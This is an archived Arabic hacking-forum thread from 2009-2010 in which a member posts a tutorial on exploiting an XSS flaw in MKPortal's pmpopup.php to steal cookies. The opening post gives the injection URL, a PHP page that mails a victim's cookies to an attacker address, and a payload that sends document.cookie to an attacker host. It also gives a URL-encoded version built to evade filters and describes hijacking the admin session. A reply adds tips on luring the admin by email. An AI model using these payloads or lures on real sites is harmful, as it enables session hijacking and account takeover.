يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. ارشيف العناكــــــــــــ'ب .:: ] > :: دورات الشبــكة :: Network Archive :: > دورة اكتشـــاف الثغـــرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 12-28-2009, 05:24 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Black-FoG
VbSpIdeR T34M
 
الصورة الرمزية Black-FoG
 

 

 
إحصائية العضو






Black-FoG غير متواجد حالياً

إرسال رسالة عبر MSN إلى Black-FoG

 

 

إحصائية الترشيح

عدد النقاط : 10
Black-FoG is on a distinguished road

افتراضي XSS معلومات واضافات


بسم الله الرحمن الرحيم

كثير من المبتدئين مثلي يسالوا عن xss ولقيت موضوع نقلته لكم عساني افهم الطريقة واتفهمون انتم وتشرحو لي ولبقية الاخوة ..
لذا حبيت اشرح هذا الدرس المتواضع عشان الكل ياخذ خلفية عنها رغم ان موضوعها قديم
بس انا قلت لما اضيف شى جديد فيها ان شاء الله الدرس يعجب الجميع

اولا : خلونا نأخذ مثال عملى لثغرة xss ونطبق عملى عشان الموضوع يصبح مفهوم للكل

ثغرتنا هتكون للاسكربت المشهور جدا وهو mkportal

الثغرة تجدوها على هذا الرابط
http://www.securityfocus.com/archive/1/447195


يلا نبدأ التفسير نقطة نقطة:
اولا :
لو شوفنا فى الثغره سنجد الاتى:

كود:
//target.com/mkportal/include/pmpopup.php?m1=<sc ript>*****(documen.xxxxi e)</script>
هذا الرابط ايش فايدته؟
طبعا وظيفته توليد كود جافا اسكربتjavascript
لكن الجاف اسكربت محتاجه انه يكون معانا موقع لينا يخصنا عشان نقدر نستغل هذه الثغره

مثال:

كود:
//attacker.com/xxxxxxstealer.php?xxxxi e=thexxxxxxvalue
من اللنك اللى فوق شايفين cooakiestealer.php
شز هذا
هو عبارة عن صفحة php عادية جدا راح نستخدمها عشان سرقة الكوكيز

طيب شو هو الكوكيز
هو عبارة عن ملفات الارتباط التى تربط دخولك باى موقع تدخله
مثلا لما تسجل فى منتدى راح تجد انك لما تدخل مره اخرى راح تجد بياناتك محفوظه
طب شو السبب؟ طبعا السبب لان ملف الكوكيز موجود فى جهازك وحافظ بيانات دخولك

من هنا ياتى اهمية xss فى سرقة الكوكيز
بمعنى اصح سرقة بيانات الدخول

طب نعود لموضوع coakie stealer.php
كيف نسوى هذه الصفحة

كود PHP:
<?

mail
("theattacker@hotmail.com","coakie monster",$_REQUEST['xxxxxx']);

?>
<html>
******************.location='http://www.somesite.com/'</script>
</html>
هذا ثال بسيط لصفحة لسرقة الكوكيز
طبعا قلنا اهميتها هى سرقة الكوكيز
يعنى تقرا محتويات الكوكيز وترسله على الايميل اللى انت حددته

الحين احنا عاوزين نوقع ضحيتنا فى الفخ

شو هو الفخ؟
انه نرسله رابط بمجرد الضغط عليه راح يسرق ملف الكوكيز الخاص به ويجى على ايميلنا

طيب شوف اول شى كنت كاتبه وهو

كود PHP:
//target.com/mkportal/include/pmpopup.php?m1=***************(********.coakie)</script> 
راح نستبدل بعد علامة = بالاتى:

كود PHP:
//target.com/mkportal/include/pmpopup.php?m1=******************.location=
'http://attacker.com/coakiestealer.php?
coakie='
+escape(********.coakie)</script> 
طب شو هذا ؟
عبارة عن كود جاف اضفناه عشان يقدر يسرق الكوكيز

طب فيه مشكلة؟
هذه الطريقه ما تصير لان فيه عملية فلتره تقوم بمنع اكواد الجافا
طب شو الحل؟

الحل هو التشفير لتجنب هذه المشكلة:

طبعا افضل تشفير لحد الحين جيد هو اليو***ود

الحين روح لهذا الرابط الل راح يشفر لنا رابطنا:
http://www.mikezilla.com/exp0012.html

بعدين حط الرابط وراح يتشفر باليو***ود ويصبح كالاتى:

كود PHP:
//target.com/mkportal/include/pmpopup.php?m1=%3C%73%63%72%69%70%74%3E%65%76%61%
6C%28%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%53%74%72%69%6E%67%2E%66%72%6F%
6D%43%68%61%72%43%6F%64%65%28%20%31%30%34%2C%31%31%36%2C%31%31%36%2C%31%31%32%
2C%35%38%2C%34%37%2C%34%37%2C%31%31%39%2C%31%31%39%2C%31%31%39%2C%34%36%2C%31%
31%39%2C%35%32%2C%39%39%2C%31%30%37%2C%34%39%2C%31%31%30%2C%31%30%33%20%2C%34%
36%2C%39%39%2C%31%31%31%2C%31%30%39%29%29%3B%3C%2F%73%63%72%69%70%74%3E 

اوكى الحين كل شى تمام

كل اللى عيك انه تبعث الرابط للادمن: بشرط
انه يكون الاسكربت مصاب
انه ما يكون فيه ترقيع لثغرات الxss

ورا تجد ان الكوكيز وبياناته راح توصلك على الايميل

طب كيف هستغل الكوكيز عشا اطلع البيانات

راح نستخدم محرر الكوكيز:



وبعد استبدال الكوكيز

سوى refres hللصفحة
وبقدرة قادر راح تصبح من عضو عادى الى ادمن

ملحوظه: كلمة xxxxi e انا غيرتها عشان التشفير

أتمنى انه يكون الموضوع بسيط واى استفسار انا مش موجود خخخخخخخ والله بصراحة احاول اتقن الدرس عندها مرحبا باستفساراتكم


Adioooos



XSS lug,lhj ,hqhthj

التوقيع

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[align=center]قريبا... فريق [-=BFT=-][/align]

 

   

رد مع اقتباس
قديم 12-28-2009, 05:37 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية GuN
 

 

 
إحصائية العضو







GuN غير متواجد حالياً

إرسال رسالة عبر MSN إلى GuN إرسال رسالة عبر Skype إلى GuN

 

 

إحصائية الترشيح

عدد النقاط : 10
GuN is on a distinguished road

افتراضي


مشككووورر اخي على الشرح الجميل تقبل مرورi

التوقيع

MosT people Respect the badge. ...Everybody respects the GuN

http://i43.tinypic.com/1zpo7yq.jpg

http://i40.tinypic.com/1r5jc9.gif

http://i42.tinypic.com/343kh2o.jpg
http://i47.tinypic.com/4h870p.jpg

 

   

رد مع اقتباس
قديم 12-28-2009, 05:39 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
Black-FoG
VbSpIdeR T34M
 
الصورة الرمزية Black-FoG
 

 

 
إحصائية العضو






Black-FoG غير متواجد حالياً

إرسال رسالة عبر MSN إلى Black-FoG

 

 

إحصائية الترشيح

عدد النقاط : 10
Black-FoG is on a distinguished road

افتراضي


مشكور على المرور العطر ... تقديري



Adiooos

التوقيع

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[align=center]قريبا... فريق [-=BFT=-][/align]

 

   

رد مع اقتباس
قديم 12-28-2009, 06:16 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
MrXRoMaNcE1
VBSPIDERS TEAM
 
الصورة الرمزية MrXRoMaNcE1
 

 

 
إحصائية العضو






MrXRoMaNcE1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MrXRoMaNcE1 is on a distinguished road

افتراضي


يعطيك الف عافية على موضوع

وثغرات xss محتاجة تشغيل دماغ لانه تطبق على ضحية مش على موقع

مثال بسيط :

لو وجدت موقع مصاب في تغرة xss لازم يفوت مدير على رابط كي اسرق الكوكيز

فانا اروح ارسله رساله على ايميله اقول ممكن تراجع موقع وتشوف هذا رابط وهكذا بتقدر تسرق كوكيز

وايضا بامكانك استخدام متصفح opera في تعديل على كوكيز وايضا يوجد اضافة في متصفح فاير فوكس

ومشككور مرة اخرى وان شاء الله اكمل اجزاء وانزل جزي تاني وتالت لاكن هاي ايام مشغول شوي

بامان الله
التوقيع

 

   

رد مع اقتباس
قديم 12-28-2009, 08:31 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Stone Love
 

 

 
إحصائية العضو







Stone Love غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Stone Love is on a distinguished road

افتراضي


مشكور يا بطل وأحلى تقييم

التوقيع

Stone Love ...... came back for more

Kala$nikoV Team I miss you

Best Friends ever :

Doom ps
Volcano
Flash

 

   

رد مع اقتباس
قديم 12-29-2009, 02:05 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


يرجى وضع كافه الاكواد بملفات مرفقه وذلك بسبب حظر بعض الكلمات المهمه
مثل
javascripet
*****s
................


وشكرا

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 12-29-2009, 02:43 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
Black-FoG
VbSpIdeR T34M
 
الصورة الرمزية Black-FoG
 

 

 
إحصائية العضو






Black-FoG غير متواجد حالياً

إرسال رسالة عبر MSN إلى Black-FoG

 

 

إحصائية الترشيح

عدد النقاط : 10
Black-FoG is on a distinguished road

افتراضي


Mr.RoMaNcE1 : مشكور على الاضافة الجميلة ... واشكرك على المرور والتعليق

stone love : شكرا على الاطراء الجميل ومشكور على التقييم الي ما وصلنيش <<<<<< طماع خخخخخخخ :>

VoLc4n0 : شكرا على المرور الطيب وان شاء الله اعيد تنسيق الموضوع ... والاكواد كامثلة فقط وساعيد رفعها في ملف TXT حتى تكتمل الافادة بادن الله تعالى

سلامي للجميع



Adiooos

التوقيع

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[align=center]قريبا... فريق [-=BFT=-][/align]

 

   

رد مع اقتباس
قديم 12-29-2009, 11:05 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية M0-SD
 

 

 
إحصائية العضو





M0-SD غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
M0-SD is on a distinguished road

افتراضي


يسلمو يا حج

و احلى تقييم مني كمان

التوقيع

الله اكبر

 

   

رد مع اقتباس
قديم 01-24-2010, 02:43 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية HartH
 

 

 
إحصائية العضو





HartH غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
HartH is on a distinguished road

افتراضي


استغلا صعب .. ونسبة نجاح غير كبيرة

التوقيع

احم احم ..

http://www.star-ee.net/vb/uploaded/5_1252718422.jpg

وكبرت يا نمس :32:

:41::41:

 

   

رد مع اقتباس
قديم 01-24-2010, 08:37 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
Black-FoG
VbSpIdeR T34M
 
الصورة الرمزية Black-FoG
 

 

 
إحصائية العضو






Black-FoG غير متواجد حالياً

إرسال رسالة عبر MSN إلى Black-FoG

 

 

إحصائية الترشيح

عدد النقاط : 10
Black-FoG is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة HartH
استغلا صعب .. ونسبة نجاح غير كبيرة

هلا HartH .... بالعكس ... حبيب قلبي .. افضل شي هو استعمال الثغرة المناسبة في الوقت المناسب ...


Adioooooos
التوقيع

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[align=center]قريبا... فريق [-=BFT=-][/align]

 

   

رد مع اقتباس
قديم 02-01-2010, 02:17 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

وواصل يابطل [ وإلى الامام ] ..



تحياتي لك أخي .

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 02-22-2010, 04:17 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
إحصائية العضو






][آلـهـٍيـكَـل آلأزٍرٍقٌ][ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
][آلـهـٍيـكَـل آلأزٍرٍقٌ][ is on a distinguished road

افتراضي


Black-FoG

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

   

رد مع اقتباس
قديم 03-21-2010, 05:09 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية Governmen7
 

 

 
إحصائية العضو






Governmen7 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Governmen7 is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . موفق بإذن الله ... لك مني أجمل تحية .

التوقيع

D0NT L34RN TO HACK ; HACK TO LEARN

That there is no possibility of this user is traveling abroad

7koma Previously & Now Governmen7

mvx@7koma.com
Or
HTT@HOTMAIL.FR

THE END


 

   

رد مع اقتباس
قديم 04-11-2010, 05:33 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
إحصائية العضو





شفتك البارح غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
شفتك البارح is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

   

رد مع اقتباس
قديم 05-19-2010, 08:30 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية man2009
 

 

 
إحصائية العضو






man2009 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
man2009 is on a distinguished road

افتراضي


مشكور يا غالي وبارك الله بيك

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[Style] : الستايل الرمضاني بشكل واضافات جديدة من القصيم هوست support قسم ستآيلات الـ vB 2 07-31-2009 01:12 PM
تحديث postbit_legacy واضافات حلوهـ xman2 قســم تطويــر المــــواقع 0 06-08-2009 03:01 PM
[Product] : Vbcms القوائم الجانبية واضافات كثيره غير معرب xman2 قســم تطويــر المــــواقع 0 05-31-2009 08:35 AM


الساعة الآن 02:23 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0